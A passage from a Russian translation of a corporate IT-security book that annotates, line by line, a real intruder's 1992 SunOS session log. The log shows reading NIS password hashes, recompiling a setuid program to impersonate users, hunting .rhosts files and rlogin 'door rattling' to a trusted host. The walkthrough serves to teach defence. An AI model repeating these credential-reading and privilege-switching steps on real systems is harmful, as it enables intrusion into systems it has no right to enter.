IT-безопасность: стоит ли рисковать корпорацией?

Маккарти Линда

Строки с № 50 по 57

Теперь он ищет что-то конкретное — "lorin". Очевидно, "lorin" не входил в систему с того времени, как хакер в последний раз взломал систему и удалил файл с учетными записями (16 января). Хакер пытается найти "lorin" в /etc/passwd с помощью команды grep, но ошибается при наборе команды. Затем он вспоминает, что именем пользователя, о котором он думает, является "lorimo", а не "lorin". Это значит, что наш парень побывал здесь раньше.

Строки с № 58 по 61

Взломщик

редактирует программу С, чтобы изменить ID пользователя на 21477. Эта новая настройка позволяет ему переключить пользователя на "lorimo".

Строки с № 62 по № 66

Еще больше опечаток. Этому парню надо пойти на курсы для машинисток.

Строки с № 67 по № 75

Здесь хакер компилирует новую версию своего исполняемого кода, дает результату (a.out) другое имя, которое он не забудет (у него превосходный словарь). Исполнив два из своих рабочих скриптов, он изменяет свой ID пользователя.

50 # last lorin

51 wtmp begins Sat Jan 16 11:37

52 # grep lor /etc/passwwd

53 grep: /etc/passwwd: No such file or directory

54 # grep lor /etc/passwd

55 # ypcat passwd | grep lor

56 lori: N.4Pgz4iUS8kk:5734:50:Lori:/home/lori:/bin/csh

57 lorimo: xxTTF8y3fSqGo:21477:50:Lori:/home/lorimo:/bin/csh

58 # ed с. с

59/uid/

60 setuid(0);

61 setuid(21477);

62 # сс сс

63 сс: Warning: File with unknown suffix (.cc) passed to Id

64 Id:.cc: No such file or directory

65 # cc "c

66>"C

67 # cc c.c

68 # mv a.out shit

69 # chmod 6777 shit

70 #./suck

71 # id

72 uid=0(root) gid=0(wheel) groups=7

73 #./shit

74$ id

75 uid=21477(lorimo) gid=0(wheel) groups=7

Строки с № 76 по № 88

Теперь он ищет, куда еще можно пойти, посылая команды rlogin в другие системы и определяя те из них, которые бы доверяли lorimo (файлы. rhosts и /etc/hosts.equiv используются для установления доверия между системами). Если lorimo доверяют другие системы, то хакеру будет предоставлен доступ к этим системам без ввода пароля. Это называется «барабанить в двери» ("door rattling"). Если ему повезет, то он получит доступ к еще большему объему информации и создаст места для запуска будущих атак изнутри.

Строка № 89

Хакер сменил свою авторизацию обратно на суперпользователя (root).

Строки с № 90 по № 92

Он снова оглядывается (отсюда и команда "who"), затем проводит двойной контроль правильности полученной информации ID пользователя.

Строки с № 93 по № 94

Хакер ищет lorimo в таблице паролей сетевой информационной службы NIS.

Строка № 95

Хакер переходит в каталог /home.

76 $ rlogin tsunami

77 Password:

78 Login incorrect

79 Login incorrect

80 login: AD

81 Connection closed.

82 $ rlogjn suntzu

83 rlogjn: not found

84 $ rlogin suntzu

85 Password:

86 Login incorrect

87 login: D

88 Connection closed.

89 $"D

90

«who

91 ingres ttyp0 Jan 18 23:02

92 root ttyp2 Jan 15 18:38 (canyon)

93 # ypcat passwd | grep lorimo

94 lorimo: xxYTF8y3fSqGo:21477:50:Lori:/home/lorimo:/bin/csh

95 # cd /home

Строка № 96

Хакер начинает подготовительную работу по поиску файлов .rhost, имеющихся в /home. Смысл такого поиска состоит в том, что некоторые люди, использующие файл .rhost (для установки доверия), могут иметь много записей в .rhost по всей сети. После запуска этой задачи он пошел дальше.

Строки с № 97 по № 98

Хакер продолжает делать опечатки.

Строки с № 99 по № 100

Нашему другу надоело быть lorimo. Он проверяет файл паролей на наличие jeff. Он решает выдать себя за jeff. Но вначале он должен отредактировать свой код.

Строки с № 101 по № 11З

Он пытается редактировать свой код, но он не в том каталоге. Он переходит в правильный каталог, редактирует код, исполняет код и становится пользователем jeff.

Строки с № 114 по № 119

Став jeff хакер сделал правильный выбор. Он вошел в новую систему (tsunami), даже не пользуясь паролем. (Это отличный пример того, как опасно устанавливать доверительные отношения между системами.)

96 # find.
– name.rhosts — print &

97 # gupr

98 # grep" C

99 # ypcat passwd | grep jeff

100 jeff: wW/q0t03L6xO.:13147:50:Jeff:/home/jeff:/bin/csh

101 # ed c.c

102 ?c,c: No such file or directory

103 #cd

104 # edc.c

105 /uid/

106 setuid(21477);

107 setuid(13147);

108 #ссс. с

109 # mv a.out shit

110 #chmod 6777 shit

111 #./shit

112 $ id

113 uid=13147(jeff) gid=0(wheel) groups=7

114 $ rlogj tsunami

115 rlogj: not found

116 $ rlogin tsunami

117 No directory! Logging in with home=/

118 SunOS Release 4.1.2 (TSUNAMI) #3: Sat Oct 24 07:56:45 PDT 1992

119 You have new mail.

Строки с № 120 по № 126

Хакер (который сейчас является пользователем jeff), запускает командную оболочку sh, чтобы не оставлять след в журналах. history оболочки csh. (Хакер тщательно следит за тем, чтобы не оставить свидетельств применения своих команд.) Затем он проверяет, нет ли кого еще в системе.